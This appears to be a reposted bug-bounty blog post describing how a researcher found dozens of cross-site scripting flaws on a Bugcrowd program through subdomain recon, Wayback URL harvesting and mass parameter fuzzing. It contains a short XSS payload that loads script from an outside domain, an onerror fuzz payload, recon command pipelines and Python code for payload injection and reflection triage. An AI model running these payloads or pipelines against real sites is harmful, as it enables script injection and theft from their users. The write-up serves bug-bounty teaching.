50+ Cross-site scripting (XSS) Vulnerabilities on Bugcrowd Public Program by Takshal (tojojo)
Hello everyone, I hope that, by God’s grace, everyone reading this blog post and their families are doing well during this pandemic.
Let me introduce the person who wrote this amazing article. He is Takshal, also known as tojojo, a cybersecurity researcher and developer from India. He has 3+ years of experience in the information security industry, and he also runs a YouTube channel under the name Tojojo; the link to the channel is at the end of this blog post.
How I found 50+ Security vulnerabilities (Cross-Site Scripting) in a public program.
So I recently decided to explore more of our industry, and the best way to start was bug bounty hunting on a well-known online platform, Bugcrowd. After registering, I had to choose a public program to begin hunting on. After going through multiple programs I found a target with a wildcard domain; for security reasons, let’s call the domain abc.com.
After selecting the target domain, I did recon on it with different tools and techniques, as I really enjoy the recon part.
The tools which were used during this process are:
- AssetFinder
- SubFinder
- Amass
- Find-domain
- Google Dorking
(Note: these tools are used to find the sub-domains of the target.)
After running the tools, I was able to gather a list of 576 sub-domains.
The next step was to find out how many of those sub-domains were live. Nowadays most hunters use httpx for this, which returns results a bit faster, but I prefer httprobe, a tool written by the security researcher Tomnomnom. I am a huge fan of Tomnomnom for his work; he has always kept me and others motivated to learn more about our industry.
Neither tool is a general port scanner: both find live hosts by sending HTTP requests. httprobe tries http on port 80 and https on port 443 by default (further ports can be added with its -p flag) and prints the URLs that answer. To identify the live hosts in the target with httprobe, the command used was:
cat subdomains.txt | httprobe | tee -a host.txt
After the probing process, I found 260 live hosts. To reconfirm, I manually opened all of the running hosts with the Open Multiple URLs browser extension (by the developer TP) to check the different functionality available on each host. In parallel I started Google dorking, and with it I found some login pages on the target’s sub-domains.
So I decided to check the login functionality there, and I found a sub-domain; let’s call it xyz.abc.com.
I found its signup page, completed the signup process, and started to look around at all the functions available in that sub-domain. After going through everything I found a vulnerable endpoint in the URL where I could perform HTML injection.
But I could inject only a 20-character HTML injection payload. I spent around two days converting the HTML injection into a cross-site scripting payload, to exploit the higher-impact vulnerability. The payload that worked was a very tiny XSS payload:
<script/src=//NJ.₨></script>
It is short for two reasons: HTML parsers accept / in place of the space between the tag name and its first attribute, and browsers NFKC-normalize and lowercase a hostname before resolving it, so the ₨ sign (whose compatibility decomposition is Rs) makes NJ.₨ resolve to nj.rs, a real domain from which an external script can be loaded.
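To see why a payload this short works under a character limit, here is an added Python example (not code from the original post or the author’s tools). It counts a payload’s cost in code points versus UTF-8 bytes, since a length limit may be enforced on either, and applies the NFKC normalization plus lowercasing that browsers perform on hostnames, showing that the src //NJ.₨ is fetched from nj.rs. The 20-character limit is taken from the text; the function names and the regular expression are my own.

```python
"""Why a tiny external-script payload fits a short length limit.

Added example (not from the original post or the author's tools).
It reports how much of a length budget a payload consumes and what
hostname a browser will actually contact after IDNA-style NFKC
normalization and case folding. The 20-character limit is the one
stated in the post; the domain nj.rs follows from its payload.
"""
import re
import unicodedata
from typing import Dict, Optional

# Matches "<script/src=//host/..." or "<script src=//host/...";
# captures the protocol-relative URL up to whitespace, a quote or '>'.
SCRIPT_SRC = re.compile(r"<script[\s/]+[^>]*?src=['\"]?(//[^\s'\">]+)", re.I)


def payload_budget(payload: str) -> Dict[str, int]:
    """Return the payload's cost in code points and in UTF-8 bytes.

    Applications enforce length limits on one or the other; a single
    code point such as U+20A8 (the rupee sign) costs three UTF-8 bytes.
    """
    return {
        "code_points": len(payload),
        "utf8_bytes": len(payload.encode("utf-8")),
    }


def fits(payload: str, limit: int, count_bytes: bool = False) -> bool:
    """True if the payload is within `limit`, measured in code points
    by default or in UTF-8 bytes when count_bytes is set."""
    budget = payload_budget(payload)
    used = budget["utf8_bytes"] if count_bytes else budget["code_points"]
    return used <= limit


def resolved_script_host(payload: str) -> Optional[str]:
    """Extract the protocol-relative script src and return the host the
    browser will resolve: NFKC-normalized (so U+20A8 becomes 'Rs') and
    lowercased, as IDNA processing does. None if no script src is found."""
    match = SCRIPT_SRC.search(payload)
    if not match:
        return None
    host = match.group(1)[2:].split("/", 1)[0]  # strip '//' and any path
    return unicodedata.normalize("NFKC", host).lower()


if __name__ == "__main__":
    tag = "<script/src=//NJ.₨>"
    print(payload_budget(tag), resolved_script_host(tag))
```

The check matters in both directions: the opening tag above is 19 code points but 21 bytes, so the same payload passes a 20-code-point limit and fails a 20-byte one. Confirming which unit the application counts is the first thing to do when a reflection looks too short to exploit.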
After entering the payload, I was able to exploit the vulnerable endpoint, which led to cross-site scripting (XSS). After examining everything I took the proof of concept (PoC), prepared a report and submitted it to the Bugcrowd platform.
Later, after I submitted the report, there was no response from their end; they fixed the vulnerability silently without informing me and marked my report as N/A (Not Applicable).
After this incident I was very depressed and disappointed and started getting negative vibes; I also started doubting my skills, which affected both my personal and professional life. Later on I decided to trust myself and my skill set.
I had been working for 3 years, so I returned to the same platform and the same target program with my own tools to show them my skills. This time, using a custom crawler script I developed together with the waybackurl script, I was able to extract more than 50,00,000 (fifty lakh, i.e. 5,000,000) endpoints across all the sub-domains of the target abc.com. (Tomnomnom publishes his tool as waybackurls; it fetches the URLs the Wayback Machine has archived for each host.) The commands used were:
cat host.txt | crawler | tee -a endpoint.txt
cat host.txt | waybackurl | tee -a endpoint.txt
After collecting all 50 lakh endpoints, I started fuzzing all the parameters for XSS with qsreplace. qsreplace replaces every query-string value in the URLs it reads with the supplied payload and outputs each host, path and parameter-name combination only once, so the raw endpoint list collapses to a much shorter list of fuzz targets. The command used was (the payload is wrapped in single quotes so the shell passes the double quote and angle brackets through unchanged):
cat endpoint.txt | qsreplace '"><img src=x onerror=alert(1)>' | tee -a xss_fuzz.txt
After executing the command, I had to check which parameters reflected our payload as plain text and which did not, so I created a tool named FREQ, which is available in my GitHub repo. The tool sends a request for each URL and checks whether the response contains the payload, returning the affected URLs.
The command used to perform this attack was:
cat xss_fuzz.txt | freq | tee -a possible_xss.txt
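As an added example (not the author’s FREQ tool or qsreplace, neither of whose code is on this page), the following Python re-implements the two steps just described so the logic can be run offline: rewriting every query-string value to the payload while keeping one URL per host, path and parameter-name set, and then classifying each response by whether the payload comes back verbatim, HTML-encoded, or not at all. The URLs and the fake server responses are constructed samples, and the fetch argument stands in for a real HTTP client.

```python
"""Parameter fuzzing and reflection triage, qsreplace/FREQ style.

Added example, not the author's tools. Step 1 mirrors qsreplace: replace
every query value with the payload, emitting one URL per host/path/
parameter-name set. Step 2 mirrors the triage FREQ performs: fetch each
fuzzed URL and bucket it by how the payload is reflected. Sample URLs and
the fake server below are constructed for the example.
"""
import html
from typing import Callable, Dict, List
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

PAYLOAD = '"><img src=x onerror=alert(1)>'


def inject_payload(url: str, payload: str = PAYLOAD) -> str:
    """Replace every query-string value with the payload, keeping names
    and order. Values are percent-encoded, as on the wire; the server
    decodes them before reflecting."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    return urlunsplit(parts._replace(query=urlencode([(k, payload) for k, _ in params])))


def fuzz_list(urls: List[str], payload: str = PAYLOAD) -> List[str]:
    """qsreplace-style: one fuzzed URL per (host, path, parameter names).
    URLs without a query string carry nothing to inject and are dropped."""
    seen, out = set(), []
    for url in urls:
        parts = urlsplit(url)
        params = parse_qsl(parts.query, keep_blank_values=True)
        if not params:
            continue
        key = (parts.netloc.lower(), parts.path, tuple(sorted(k for k, _ in params)))
        if key in seen:
            continue
        seen.add(key)
        out.append(inject_payload(url, payload))
    return out


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """'raw' if the payload appears verbatim (worth manual review),
    'encoded' if only an HTML-escaped copy is present (probably safe),
    'none' if it is not reflected at all."""
    if payload in body:
        return "raw"
    escaped = [html.escape(payload, quote=True), html.escape(payload, quote=False),
               html.escape(payload, quote=False).replace('"', "&#34;")]
    if any(e in body for e in escaped):
        return "encoded"
    return "none"


def triage(fuzzed: List[str], fetch: Callable[[str], str]) -> Dict[str, List[str]]:
    """FREQ-style pass: fetch each fuzzed URL and bucket it by reflection.
    `fetch` is injected so the example runs offline; in practice it would
    be something like requests.get(url, timeout=10).text."""
    buckets: Dict[str, List[str]] = {"raw": [], "encoded": [], "none": []}
    for url in fuzzed:
        buckets[classify_reflection(fetch(url))].append(url)
    return buckets


# Constructed sample input (not data from the original post).
SAMPLE_URLS = [
    "https://xyz.abc.com/search?q=shoes&page=1",
    "https://xyz.abc.com/search?page=2&q=hats",   # same param set: deduplicated
    "https://xyz.abc.com/profile?name=bob",
    "https://xyz.abc.com/static/app.js",           # no parameters: skipped
]


def fake_fetch(url: str) -> str:
    """Simulated server: /search reflects the value raw, /profile escapes it."""
    parts = urlsplit(url)
    values = dict(parse_qsl(parts.query))
    if parts.path == "/search":
        return "<p>Results for %s</p>" % values.get("q", "")
    if parts.path == "/profile":
        return "<p>Hello %s</p>" % html.escape(values.get("name", ""), quote=True)
    return "<html></html>"


if __name__ == "__main__":
    for bucket, urls in triage(fuzz_list(SAMPLE_URLS), fake_fetch).items():
        print(bucket, urls)
```

A raw reflection is only a candidate: the payload may land inside a script block, an attribute with a different quoting style, or a context protected by a Content Security Policy, which is why the author still went through every flagged endpoint by hand before reporting.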
When the run finished, I had found about one thousand endpoints reflecting the payload as clear text. So I went through all the affected endpoints again manually, and I found 80 unique XSS vulnerabilities, of which I reported around 56; all the reported vulnerabilities were accepted by the platform. A number of other XSS reports are still pending.
Thank you everyone for taking the time to read my blog post, and I am sorry for any grammatical mistakes in it.
What an amazing article by Takshal Patel!
Tojojo’s Youtube Channel: https://www.youtube.com/@tojojo9625
Support me: If you like to support me, buy me a cup of coffee ☕
Follow me: @0xKayala | Satya Prakash